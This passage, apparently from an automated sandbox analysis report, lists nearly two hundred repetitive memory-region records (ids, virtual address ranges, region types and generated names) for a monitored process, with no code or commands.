"" Region: id = 4992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5049 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5050 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 5051 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5120 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5125 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5126 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5127 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5159 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5160 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 5161 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5175 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 